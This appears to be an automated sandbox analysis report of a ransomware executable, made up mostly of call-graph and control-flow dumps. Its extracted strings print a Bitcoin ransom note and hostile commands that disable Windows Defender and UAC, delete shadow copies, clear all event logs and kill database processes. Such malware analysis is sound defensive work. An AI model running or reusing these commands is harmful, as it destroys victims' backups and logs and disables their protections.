114407->114408 115214 a61700 114408->115214 114411 9dc131 ctype 114413 a405bb __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 114411->114413 114412 a61daa Concurrency::details::_CancellationTokenState::_RegisterCallback 93 API calls 114414 9dbdc9 ListArray 114412->114414 114415 9dc152 114413->114415 114419 9e8b80 102 API calls 114414->114419 114416 9dc160 114417 a65132 messages 26 API calls 114416->114417 114418 9dc165 __wsopen_s 114417->114418 114423 9dc18c GetConsoleWindow ShowWindow 114418->114423 114420 9dbe43 114419->114420 114421 9e7b00 66 API calls 114420->114421 114422 9dbe7e 114421->114422 115217 9e8620 98 API calls 114422->115217 114425 9dc1d4 114423->114425 114459 9dc269 114423->114459 114427 9e1800 collate 28 API calls 114425->114427 114426 9dbe9c 114429 9b3740 66 API calls 114426->114429 114430 9dc201 114427->114430 114428 9e1940 28 API calls 114428->114430 114431 9dbedc 114429->114431 114430->114428 114433 9dc239 114430->114433 115218 9eafb0 100 API calls 114431->115218 114436 9e1c10 _MREFOpen@16 28 API calls 114433->114436 114434 9dbfee 114435 9dbffd 114434->114435 114437 9e7930 90 API calls 114434->114437 114443 9e7a00 26 API calls 114435->114443 114438 9dc24a 114436->114438 114441 9dc00c 114437->114441 115223 9d68a0 326 API calls 11 library calls 114438->115223 114439 9dbeea 114439->114434 114444 9dc156 114439->114444 114470 9dbf36 ctype 114439->114470 114440 9ea5b0 28 API calls 114440->114470 114446 a61daa Concurrency::details::_CancellationTokenState::_RegisterCallback 93 API calls 114441->114446 114448 9dc037 114443->114448 115222 9e8080 28 API calls SimpleUString::operator= 114444->115222 114446->114435 114447 9dc24f 114451 9e1ac0 collate 26 API calls 114447->114451 114453 9dc065 114448->114453 114458 9b3740 66 API calls 114448->114458 114450 9dc15b 114455 a65132 messages 26 API calls 114450->114455 114456 9dc264 114451->114456 114452 9dc415 114457 9b8780 97 API calls 114452->114457 114469 9de585 114452->114469 114454 9e47b0 93 API calls 114453->114454 114465 9dc097 std::ios_base::_Ios_base_dtor 114454->114465 114455->114416 114456->114459 114474 9dc432 114457->114474 114458->114453 114459->114452 114460 9dc3fd SetErrorMode SetConsoleTitleW 114459->114460 114463 9c58e0 6 API calls 114460->114463 114461 9e12d0 28 API calls 114461->114470 114463->114452 114464 9dc510 114468 9c2870 30 API calls 114464->114468 114465->114450 114467 9dc101 ctype 114465->114467 114467->114411 114467->114416 114472 9dc515 GetModuleFileNameW 114468->114472 114471 a405bb __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 114469->114471 114470->114434 114470->114439 114470->114440 114470->114450 114470->114461 115219 9c8240 73 API calls 3 library calls 114470->115219 115220 9eb5f0 28 API calls 2 library calls 114470->115220 115221 9eafb0 100 API calls 114470->115221 114473 9de59f 114471->114473 114475 9e1260 28 API calls 114472->114475 114474->114464 114477 9e1360 28 API calls 114474->114477 114476 9dc53b 114475->114476 114478 9c36f0 29 API calls 114476->114478 114479 9dc495 114477->114479 114480 9dc544 114478->114480 114481 9e9040 28 API calls 114479->114481 114482 9c3590 29 API calls 114480->114482 114483 9dc4ab 114481->114483 114484 9dc54f 114482->114484 114485 9e9580 28 API calls 114483->114485 114486 9e11d0 26 API calls 114484->114486 114488 9dc4c1 114485->114488 114487 9dc55a 114486->114487 114489 9b49c0 52 API calls 114487->114489 114490 9e1ac0 collate 26 API calls 114488->114490 114491 9dc565 114489->114491 114492 9dc4cf 114490->114492 114493 9e9b40 28 API calls 114491->114493 114494 9e1ac0 collate 26 API calls 114492->114494 114495 9dc57a 114493->114495 114496 9dc4de 114494->114496 114497 9e9c10 28 API calls 114495->114497 114499 9b8780 97 API calls 114496->114499 114498 9dc590 114497->114498 114500 9e9ad0 28 API calls 114498->114500 114501 9dc4f6 114499->114501 114502 9dc5a6 114500->114502 114503 9e1ac0 collate 26 API calls 114501->114503 114504 9b49c0 52 API calls 114502->114504 114505 9dc501 114503->114505 114506 9dc5b4 114504->114506 114507 9e1ac0 collate 26 API calls 114505->114507 114508 9b49c0 52 API calls 114506->114508 114507->114464 114509 9dc5c3 114508->114509 114510 9dc5dc CopyFileW 114509->114510 114511 9e9b40 28 API calls 114510->114511 114512 9dc5fa 114511->114512 114513 9e9c10 28 API calls 114512->114513 114514 9dc610 114513->114514 114515 9e9ad0 28 API calls 114514->114515 114516 9dc626 114515->114516 114517 9b49c0 52 API calls 114516->114517 114518 9dc634 114517->114518 114519 9b49c0 52 API calls 114518->114519 114520 9dc643 114519->114520 114521 9dc65c CopyFileW 114520->114521 114522 9dc671 114521->114522 114523 9ea4d0 28 API calls 114522->114523 114524 9dc695 114523->114524 114525 9e8f40 28 API calls 114524->114525 114526 9dc6b0 114525->114526 114527 9e9580 28 API calls 114526->114527 114528 9dc6c6 114527->114528 114529 9e1ac0 collate 26 API calls 114528->114529 114530 9dc6d8 114529->114530 114531 9e8f40 28 API calls 114530->114531 114532 9dc6ef 114531->114532 114533 9e9580 28 API calls 114532->114533 114534 9dc705 114533->114534 114535 9e1ac0 collate 26 API calls 114534->114535 114536 9dc717 114535->114536 114537 9b8780 97 API calls 114536->114537 114538 9dc72f 114537->114538 114539 9e1ac0 collate 26 API calls 114538->114539 114540 9dc73a 114539->114540 114541 9b8780 97 API calls 114540->114541 114542 9dc752 114541->114542 114543 9e1ac0 collate 26 API calls 114542->114543 114544 9dc75d 114543->114544 114545 9ea4d0 28 API calls 114544->114545 114546 9dc793 114545->114546 114547 9e8f40 28 API calls 114546->114547 114548 9dc7ae 114547->114548 114549 9e9580 28 API calls 114548->114549 114550 9dc7c4 114549->114550 114551 9e1ac0 collate 26 API calls 114550->114551 114552 9dc7d6 114551->114552 114553 9b8780 97 API calls 114552->114553 114554 9dc7ee 114553->114554 114555 9e1ac0 collate 26 API calls 114554->114555 114556 9dc7f9 114555->114556 114557 9d3dd0 28 API calls 114556->114557 114558 9dc7fe 114557->114558 114559 9b8780 97 API calls 114558->114559 114560 9dc814 114559->114560 114561 9e12d0 28 API calls 114560->114561 114562 9dc843 114561->114562 114563 9c3100 42 API calls 114562->114563 114567 9dc848 114563->114567 114564 9dc8b3 114565 9c5d90 6 API calls 114564->114565 114566 9dc8bb 114565->114566 114568 9c5d90 6 API calls 114566->114568 114567->114564 114571 9e12d0 28 API calls 114567->114571 114569 9dc8c5 114568->114569 114570 9c5d90 6 API calls 114569->114570 114575 9dc8dc 114569->114575 114573 9dc8d2 114570->114573 114572 9dc88b 114571->114572 114574 9e12d0 28 API calls 114572->114574 114576 9c5d90 6 API calls 114573->114576 114577 9dc89e 114574->114577 114579 9ea4d0 28 API calls 114575->114579 114576->114575 114578 9b92a0 148 API calls 114577->114578 114578->114564 114580 9dc926 114579->114580 114581 9e1a90 28 API calls 114580->114581 114582 9dc93b 114581->114582 114583 9b8a80 71 API calls 114582->114583 114584 9dc94c 114583->114584 114585 9e11d0 26 API calls 114584->114585 114586 9dc95a 114585->114586 114587 9b49c0 52 API calls 114586->114587 114588 9dc965 114587->114588 114589 9ea4d0 28 API calls 114588->114589 114590 9dc999 114589->114590 114591 9b8a80 71 API calls 114590->114591 114592 9dc9ae 114591->114592 114593 9e9d90 28 API calls 114592->114593 114594 9dc9be 114593->114594 114595 9e11d0 26 API calls 114594->114595 114596 9dc9cc 114595->114596 114597 9b49c0 52 API calls 114596->114597 114598 9dc9d7 114597->114598 114599 9b49c0 52 API calls 114598->114599 114600 9dc9e2 114599->114600 114601 9c4500 31 API calls 114600->114601 114648 9dc9eb 114601->114648 114602 9dcad8 114604 9e12d0 28 API calls 114602->114604 114603 9e9b40 28 API calls 114603->114648 114605 9dcaea 114604->114605 114607 9b4a20 52 API calls 114605->114607 114606 9e9c10 28 API calls 114606->114648 114608 9dcaf9 114607->114608 114610 9b49c0 52 API calls 114608->114610 114609 9e9ad0 28 API calls 114609->114648 114611 9dcb0e 114610->114611 114612 9dcb92 114611->114612 114614 9e9b40 28 API calls 114611->114614 114615 9e9b40 28 API calls 114612->114615 114613 9e11d0 26 API calls 114613->114648 114617 9dcb2c 114614->114617 114616 9dcba7 114615->114616 114618 9dcbbc 114616->114618 114619 9dcbb7 114616->114619 114620 9e9c10 28 API calls 114617->114620 114622 9e12d0 28 API calls 114618->114622 115224 9d0fa0 139 API calls 4 library calls 114619->115224 114623 9dcb45 114620->114623 114624 9dcbce 114622->114624 114625 9e9ad0 28 API calls 114623->114625 114626 9b4a20 52 API calls 114624->114626 114627 9dcb5e 114625->114627 114628 9dcbee 114626->114628 114629 9e11d0 26 API calls 114627->114629 114631 9dcc27 114628->114631 114633 9e12d0 28 API calls 114628->114633 114632 9dcb6d 114629->114632 114630 9e12d0 28 API calls 114630->114648 114638 9dcc57 114631->114638 114639 9b49c0 52 API calls 114631->114639 114634 9b49c0 52 API calls 114632->114634 114636 9dcc04 114633->114636 114637 9dcb78 114634->114637 114635 9b4a20 52 API calls 114635->114648 114641 9b4a20 52 API calls 114636->114641 114642 9b49c0 52 API calls 114637->114642 114640 9b49c0 52 API calls 114638->114640 114639->114638 114643 9dcc78 114640->114643 114641->114631 114645 9dcb83 114642->114645 114646 9dd02b ListArray 114643->114646 114647 9dcc85 114643->114647 114644 9b49c0 52 API calls 114644->114648 114649 9b49c0 52 API calls 114645->114649 114653 9e37b0 132 API calls 114646->114653 114650 9e12d0 28 API calls 114647->114650 114648->114602 114648->114603 114648->114606 114648->114609 114648->114613 114648->114630 114648->114635 114648->114644 114649->114612 114651 9dcc97 114650->114651 114652 9b4a20 52 API calls 114651->114652 114654 9dcca6 114652->114654 114655 9dd055 114653->114655 114656 9b49c0 52 API calls 114654->114656 114657 9e9130 92 API calls 114655->114657 114658 9dccbb 114656->114658 114659 9dd069 114657->114659 114665 9dccd6 114658->114665 115225 9e11a0 28 API calls SimpleUString::operator= 114658->115225 114662 9e3740 95 API calls 114659->114662 114661 9e12d0 28 API calls 114661->114665 114666 9dd086 ListArray 114662->114666 114664 9dcd0d ListArray 114671 9e3b00 132 API calls 114664->114671 114665->114661 114665->114664 114667 9dcd04 Sleep 114665->114667 115226 9baed0 132 API calls 5 library calls 114665->115226 114668 9c5e60 30 API calls 114666->114668 114667->114665 114669 9dd11c 114668->114669 114670 9f5c80 22 API calls 114669->114670 114672 9dd135 ListArray 114670->114672 114673 9dcd37 114671->114673 114674 9de5b0 30 API calls 114672->114674 115227 9eae30 28 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 114673->115227 114676 9dd15d ListArray 114674->114676 114680 9de750 30 API calls 114676->114680 114677 9dcd6f 114678 9e3a90 95 API calls 114677->114678 114679 9dcd7e 114678->114679 114681 9e1bd0 _MREFOpen@16 28 API calls 114679->114681 114682 9dd188 114680->114682 114683 9dcd8e 114681->114683 114684 9e0230 28 API calls 114682->114684 114685 9e1bd0 _MREFOpen@16 28 API calls 114683->114685 114686 9dd1a6 114684->114686 114690 9dcda2 114685->114690 114687 9f2590 30 API calls 114686->114687 114688 9dd1bc 114687->114688 114689 9e0230 28 API calls 114688->114689 114691 9dd1d6 114689->114691 114693 9e1360 28 API calls 114690->114693 114692 9f23c0 30 API calls 114691->114692 114694 9dd1ec 114692->114694 114695 9dcde2 114693->114695 114698 9b7e30 28 API calls 114694->114698 114696 9e1b10 26 API calls 114695->114696 114697 9dcded 114696->114697 114699 9e1ac0 collate 26 API calls 114697->114699 114700 9dd212 114698->114700 114701 9dcdf8 114699->114701 114703 9e1b10 26 API calls 114700->114703 114702 9e1360 28 API calls 114701->114702 114704 9dce14 114702->114704 114705 9dd21d 114703->114705 114707 9e1b10 26 API calls 114704->114707 114706 9e1ac0 collate 26 API calls 114705->114706 114708 9dd228 114706->114708 114709 9dce1f 114707->114709 114710 9e1360 28 API calls 114708->114710 114711 9e1ac0 collate 26 API calls 114709->114711 114712 9dd240 114710->114712 114715 9dce2a 114711->114715 114713 9e1360 28 API calls 114712->114713 114714 9dd260 114713->114714 114716 9e1a90 28 API calls 114714->114716 114717 9e1360 28 API calls 114715->114717 114718 9dd28c 114716->114718 114720 9dce6b 114717->114720 114719 9c3f00 30 API calls 114718->114719 114721 9dd2b4 114719->114721 114722 9ea5b0 28 API calls 114720->114722 114724 9e95d0 28 API calls 114721->114724 114723 9dcea5 114722->114723 115228 9e1170 28 API calls SimpleUString::operator= 114723->115228 114726 9dd2e7 114724->114726 114728 9e1b10 26 API calls 114726->114728 114727 9dceb8 115229 9e11a0 28 API calls SimpleUString::operator= 114727->115229 114730 9dd2f5 114728->114730 114731 9e1ac0 collate 26 API calls 114730->114731 114732 9dd300 114731->114732 114734 9e1c10 _MREFOpen@16 28 API calls 114732->114734 114733 9dcec9 114735 9e1360 28 API calls 114733->114735 114736 9dd345 114734->114736 114740 9dcf0a 114735->114740 114737 9b7e30 28 API calls 114736->114737 114738 9dd35a 114737->114738 114739 9e1b10 26 API calls 114738->114739 114741 9dd366 114739->114741 114742 9ea5b0 28 API calls 114740->114742 114743 9e1ac0 collate 26 API calls 114741->114743 114744 9dcf44 114742->114744 114745 9dd371 ListArray 114743->114745 115230 9e11a0 28 API calls SimpleUString::operator= 114744->115230 114748 9e37b0 132 API calls 114745->114748 114747 9dcf59 114749 9b7fe0 28 API calls 114747->114749 114750 9dd39b 114748->114750 114751 9dcf88 114749->114751 114752 9e8f40 28 API calls 114750->114752 114753 9e1b10 26 API calls 114751->114753 114754 9dd3b6 114752->114754 114755 9dcf94 114753->114755 114756 9e9580 28 API calls 114754->114756 114757 9e1ac0 collate 26 API calls 114755->114757 114758 9dd3cf 114756->114758 114759 9dcf9f 114757->114759 114760 9e9470 92 API calls 114758->114760 115231 9e1a60 28 API calls collate 114759->115231 114762 9dd3e3 114760->114762 114766 9e1ac0 collate 26 API calls 114762->114766 114763 9dcfae 114764 9e1a90 28 API calls 114763->114764 114765 9dcfbf 114764->114765 114767 9e1ac0 collate 26 API calls 114765->114767 114769 9dcfca 114767->114769 114770 9b49c0 52 API calls 114769->114770 114772 9dcfd5 114770->114772 114775 9e1ac0 collate 26 API calls 114772->114775 114776 9dcfe0 114775->114776 115319 a61568 115214->115319 115216 9dbdb8 115216->114412 115216->114467 115217->114426 115218->114439 115219->114470 115220->114470 115221->114470 115222->114450 115223->114447 115224->114618 115225->114665 115226->114665 115227->114677 115228->114727 115229->114733 115230->114747 115231->114763 115322 a61574 __FrameHandler3::FrameUnwindToState 115319->115322 115320 a61582 115321 a659b3 __Stoulx 20 API calls 115320->115321 115323 a61587 115321->115323 115322->115320 115324 a615af 115322->115324 115336 a65122 26 API calls __wsopen_s 115323->115336 115326 a615b4 115324->115326 115327 a615c1 115324->115327 115328 a659b3 __Stoulx 20 API calls 115326->115328 115329 a74523 std::_Xfsopen 23 API calls 115327->115329 115331 a61592 __wsopen_s 115328->115331 115330 a615ca 115329->115330 115332 a615d1 115330->115332 115333 a615de 115330->115333 115331->115216 115334 a659b3 __Stoulx 20 API calls 115332->115334 115337 a61612 LeaveCriticalSection std::_Xfsopen __fread_nolock 115333->115337 115334->115331 115336->115331 115337->115331

                                          Executed Functions

                                          Function 009D4049 Relevance: 192.5, APIs: 13, Strings: 93, Instructions: 7001COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $If You Want To Restore Them Email Us : $To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .Every Day The Delay Increases The Price !! The Decryp$ ",$ /f$ ::$ <span class="spnn">$ ="$" start= auto$" start=auto$", $","$"cmd.exe","$"disaust",$"ren_end",$.PBF$.txt$:: $:\Documents and Settings\$:\Users\$:\Windows\SysMain.sys$</span></br></br>If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $</span></br></br>If You Want To Restore Them Email Us : <span class="spnn">$</span></br></br>To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .</br></br>Every Day The Delay Increases The $</title><style>.spnn { background-color:yellow;} .xsw{color:white;} .Circe1 {display: list-item;padding-left:30px;}.dives{backgrou$<html><head><title>$=" $All Your Files Are Locked And Important Data Downloaded !Your Files Are No Longer Accessible Don't Waste Your Time, Without $Dflt$Dflt$INW15$Lpath$Second Email :$Telegram , ID :$Version 5.$X$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe$\AppData\SysMain.sys$\Start Menu\Programs\Startup\Xinfecter.exe$_Mail-$_[ID-$user$alterencsz="$alterencsz="",$asykat$asykat$c$c$c:\R_cfg.ini$c:\skips.txt$c_drive="$c_drive=""$c_end$dcdcf$dismx$emptyString$file$for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"$fpath="$fpath=""$h2gq$invalid stod argument$k2ba8v$mode="$mode="",$mode="fast",$mode="slow",$n7t0$nodisk$noshare$p2h6$r1d8la$reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic$sc create SqlBakup binPath= "$skip_path="$skip_path=""$spath$spath="$spath=""$stod argument out of range$taskkill /PID $taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskk$tasklist /v /fo csv | findstr /i "dcdcf"$thd_per_drv="$thd_per_drv=""$total_thd="$total_thd=""$u4g8$ver$w#G!$w#G!$w#G!$w#G!
                                          • API String ID: 0-852587191
                                          • Opcode ID: 28b7ea6ea7f228d8a175c3c11f143bb99fca5bfc82a661ae0129a6926ca4515a
                                          • Instruction ID: f8b3bad370b55ce484c998e22cf8d5ef014ff24b5d93e7df2a4d97606baec368
                                          • Opcode Fuzzy Hash: 28b7ea6ea7f228d8a175c3c11f143bb99fca5bfc82a661ae0129a6926ca4515a
                                          • Instruction Fuzzy Hash: 7BD30570E002489BDF14EF64CD86BDEBBB5AF85314F108699E405A7392EB749B84CF91
                                          Function 009DC170 Relevance: 90.8, APIs: 5, Strings: 46, Instructions: 1531COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2805 9dc170-9dc1ce call a41740 GetConsoleWindow ShowWindow 2808 9dc269-9dc2ff call 9e90a0 * 3 2805->2808 2809 9dc1d4-9dc20d call 9e1800 2805->2809 2827 9dc306-9dc317 call 9e90a0 2808->2827 2815 9dc210-9dc237 call 9e1940 * 2 2809->2815 2824 9dc239-9dc264 call 9e1c10 call 9d68a0 call 9e1ac0 2815->2824 2833 9dc322-9dc329 2824->2833 2827->2833 2835 9dc32f-9dc343 2833->2835 2836 9dc422-9dc44e call 9b8780 call 9e13c0 2833->2836 2839 9dc345-9dc348 2835->2839 2840 9dc382-9dc385 2835->2840 2854 9dc454-9dc50b call 9e13c0 * 2 call 9e1360 call 9e9040 call 9e9580 call 9e1ac0 * 2 call 9e1660 call 9b8780 call 9e1ac0 * 2 2836->2854 2855 9dc510-9dc852 call 9c2870 GetModuleFileNameW call 9e1260 call 9c36f0 call 9c3590 call 9e11d0 call 9b49c0 call 9e9b40 call 9e9c10 call 9e9ad0 call 9b49c0 * 2 call 9e1090 * 2 CopyFileW call 9e9b40 call 9e9c10 call 9e9ad0 call 9b49c0 * 2 call 9e1090 * 2 CopyFileW call 9e10a0 call 9e10c0 call 9ea4d0 call 9e8f40 call 9e9580 call 9e1ac0 call 9e8f40 call 9e9580 call 9e1ac0 call 9e1660 call 9b8780 call 9e1ac0 call 9e1660 call 9b8780 call 9e1ac0 call 9e10a0 call 9e10c0 call 9ea4d0 call 9e8f40 call 9e9580 call 9e1ac0 call 9e1660 call 9b8780 call 9e1ac0 call 9d3dd0 call 9b8780 call 9e13c0 call 9e12d0 call 9c3100 2836->2855 2844 9dc350-9dc35a 2839->2844 2841 9dc387-9dc38a 2840->2841 2842 9dc3c2-9dc3c5 2840->2842 2845 9dc390-9dc39a 2841->2845 2846 9dc3fd-9dc410 SetErrorMode SetConsoleTitleW call 9c58e0 2842->2846 2847 9dc3c7-9dc3ca 2842->2847 2844->2844 2849 9dc35c-9dc37d 2844->2849 2845->2845 2850 9dc39c-9dc3bd 2845->2850 2857 9dc415-9dc41c 2846->2857 2851 9dc3d0-9dc3da 2847->2851 2849->2840 2850->2842 2851->2851 2856 9dc3dc-9dc3f9 2851->2856 2854->2855 2980 9dc854-9dc85b 2855->2980 2981 9dc8b6-9dc8cb call 9c5d90 * 2 2855->2981 2856->2846 2857->2836 2860 9de585-9de5a2 call a405bb 2857->2860 2980->2981 2983 9dc85d-9dc864 2980->2983 2990 9dc8cd-9dc8ec call 9c5d90 * 2 2981->2990 2991 9dc8f2-9dca02 call 9e10a0 call 9e10c0 call 9ea4d0 call 9e1a90 call 9b8a80 call 9e11d0 call 9b49c0 call 9e10a0 call 9e10c0 call 9ea4d0 call 9b8a80 call 9e9d90 call 9e11d0 call 9b49c0 * 2 call 9c4500 call 9e12b0 2981->2991 2983->2981 2985 9dc866-9dc872 call 9eafa0 2983->2985 2985->2981 2992 9dc874-9dc8b3 call 9e12d0 * 2 call 9b92a0 2985->2992 2990->2991 3037 9dca04-9dca06 2991->3037 2992->2981 3038 9dca0c-9dcaa9 call 9e9b40 call 9e9c10 call 9e9ad0 call 9e11d0 call 9b49c0 * 3 call 9e12d0 call 9b4a20 3037->3038 3039 9dcad8-9dcb15 call 9e12d0 call 9b4a20 call 9b49c0 3037->3039 3093 9dcaae-9dcaca call 9b49c0 3038->3093 3052 9dcb17-9dcb8d call 9e9b40 call 9e9c10 call 9e9ad0 call 9e11d0 call 9b49c0 * 3 3039->3052 3053 9dcb92-9dcbb5 call 9e9b40 3039->3053 3052->3053 3061 9dcbbc-9dcbf0 call 9e12d0 call 9b4a20 3053->3061 3062 9dcbb7 call 9d0fa0 3053->3062 3079 9dcc32 3061->3079 3080 9dcbf2-9dcc22 call 9e12d0 call 9b4a20 3061->3080 3062->3061 3085 9dcc39-9dcc41 3079->3085 3099 9dcc27-9dcc30 3080->3099 3089 9dcc5d-9dcc7f call 9b49c0 3085->3089 3090 9dcc43-9dcc57 call 9b49c0 3085->3090 3101 9dd02b-9dd1f1 call a58980 call 9e37b0 call 9e9130 call 9b3730 call 9e3740 call a58980 call 9c5e60 call 9f5c80 call a58980 call 9de5b0 call a58980 call 9de750 call 9e0230 call 9f2590 call 9e0230 call 9f23c0 3089->3101 3102 9dcc85-9dccc2 call 9e12d0 call 9b4a20 call 9b49c0 3089->3102 3090->3089 3093->3039 3106 9dcacc-9dcad3 3093->3106 3099->3079 3099->3085 3177 9dd1f7-9dd200 3101->3177 3118 9dccc4-9dccd1 call 9e11a0 3102->3118 3119 9dccd6-9dccdc 3102->3119 3106->3037 3118->3119 3123 9dcce0-9dccfb call 9e12d0 call 9baed0 3119->3123 3132 9dcd0d-9dd026 call a58980 call 9e3b00 call 9e0cc0 call 9eae30 call 9e3a90 call 9e1bd0 * 2 call 9e1400 * 2 call 9e1360 call 9e1b10 call 9e1ac0 call 9e1360 call 9e1b10 call 9e1ac0 call 9e13c0 * 2 call 9e1360 call 9e16c0 call 9e16e0 call 9ea5b0 call 9e1170 call 9e11a0 call 9e13c0 * 2 call 9e1360 call 9e16c0 call 9e16e0 call 9ea5b0 call 9e11a0 call 9b7fe0 call 9e1b10 call 9e1ac0 call 9e1a60 call 9e1a90 call 9e1ac0 call 9b49c0 call 9e1ac0 call 9b49c0 call 9e1ac0 * 4 call 9bac80 3123->3132 3133 9dccfd 3123->3133 3313 9dd82e-9dd891 call a58980 call 9b76c0 call 9f1ba0 call 9e1260 call 9e0e90 3132->3313 3135 9dccff-9dcd02 3133->3135 3136 9dcd04-9dcd0b Sleep 3133->3136 3135->3132 3135->3136 3136->3123 3177->3177 3179 9dd202-9dd26e call 9b7e30 call 9e1b10 call 9e1ac0 call 9e1360 * 2 3177->3179 3201 9dd270-9dd279 3179->3201 3201->3201 3203 9dd27b-9dd291 call 9e1a90 3201->3203 3209 9dd297-9dd2a0 3203->3209 3209->3209 3211 9dd2a2-9dd2c1 call 9c3f00 3209->3211 3218 9dd2c6-9dd2cf 3211->3218 3218->3218 3220 9dd2d1-9dd30a call 9e95d0 call 9e1b10 call 9e1ac0 3218->3220 3233 9dd310-9dd319 3220->3233 3233->3233 3235 9dd31b-9dd72c call 9e1c10 call 9b7e30 call 9e1b10 call 9e1ac0 call a58980 call 9e37b0 call 9e8f40 call 9e9580 call 9e9470 call 9b3730 call 9e1ac0 * 2 call 9e3740 call 9e10a0 call 9e10c0 call 9ea4d0 call a58980 call 9e37b0 call 9e9490 call 9e9470 call 9e1ac0 call 9e9490 call 9e9470 call 9e1ac0 call 9e3740 call 9e1c10 call 9c4670 call 9e9b40 call 9e9c10 call 9e9ad0 call 9b49c0 * 2 call a58980 call 9e3b00 call 9b3730 call 9e3a90 call 9e12d0 call 9d1c90 3233->3235 3395 9dd731-9dd825 call 9bac80 call 9b49c0 call 9e1ac0 * 2 call 9bb040 call 9e1ac0 call 9bb040 call 9e1ac0 * 5 call 9b7d70 call 9c6020 * 2 3235->3395 3336 9dd8a3-9ddba9 call 9e9de0 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e11d0 call 9b49c0 * 10 call 9e1bd0 call 9e1660 call a65282 call 9e1bd0 call 9e1660 call a65282 call 9e9de0 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e11d0 call 9b49c0 * 8 call 9e90a0 3313->3336 3337 9dd893-9dd89e call 9e1170 3313->3337 3489 9ddbaf-9ddbc0 call 9bf5e0 3336->3489 3490 9ddd17-9ddd28 call 9e90a0 3336->3490 3337->3336 3395->3313 3457 9dd829 call 9bb040 3395->3457 3457->3313 3497 9de4a4-9de580 call 9b8780 call 9e1ac0 * 3 call 9b49c0 call 9b78d0 call 9b49c0 * 2 call 9e1ac0 * 8 call 9b49c0 * 3 call 9e1ac0 3489->3497 3498 9ddbc6-9ddcb7 call 9e9b40 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9b49c0 * 5 call 9e1090 * 2 call a659c6 3489->3498 3495 9ddd2e-9de0a3 call 9b5130 * 2 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9b5330 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9b5330 3490->3495 3496 9de450-9de461 call 9e90a0 3490->3496 3687 9de0a9-9de42f call 9b5130 * 2 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9b5330 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9b5330 call 9b5240 * 2 3495->3687 3688 9de434-9de44e call 9b5240 * 2 3495->3688 3509 9de491-9de49d call 9cf570 3496->3509 3510 9de463-9de478 call 9cdaf0 * 2 3496->3510 3497->2860 3601 9ddcb9-9ddd00 call 9e9c70 call 9e11d0 call 9b49c0 call 9e1090 * 2 call a659c6 3498->3601 3602 9ddd03-9ddd12 call 9b49c0 3498->3602 3509->3497 3525 9de49f 3509->3525 3510->3497 3533 9de47a-9de48f call 9cdaf0 * 2 3510->3533 3525->3497 3530 9de49f call 9cf570 3525->3530 3530->3497 3533->3497 3601->3602 3602->3497 3687->3688 3688->3497
                                          APIs
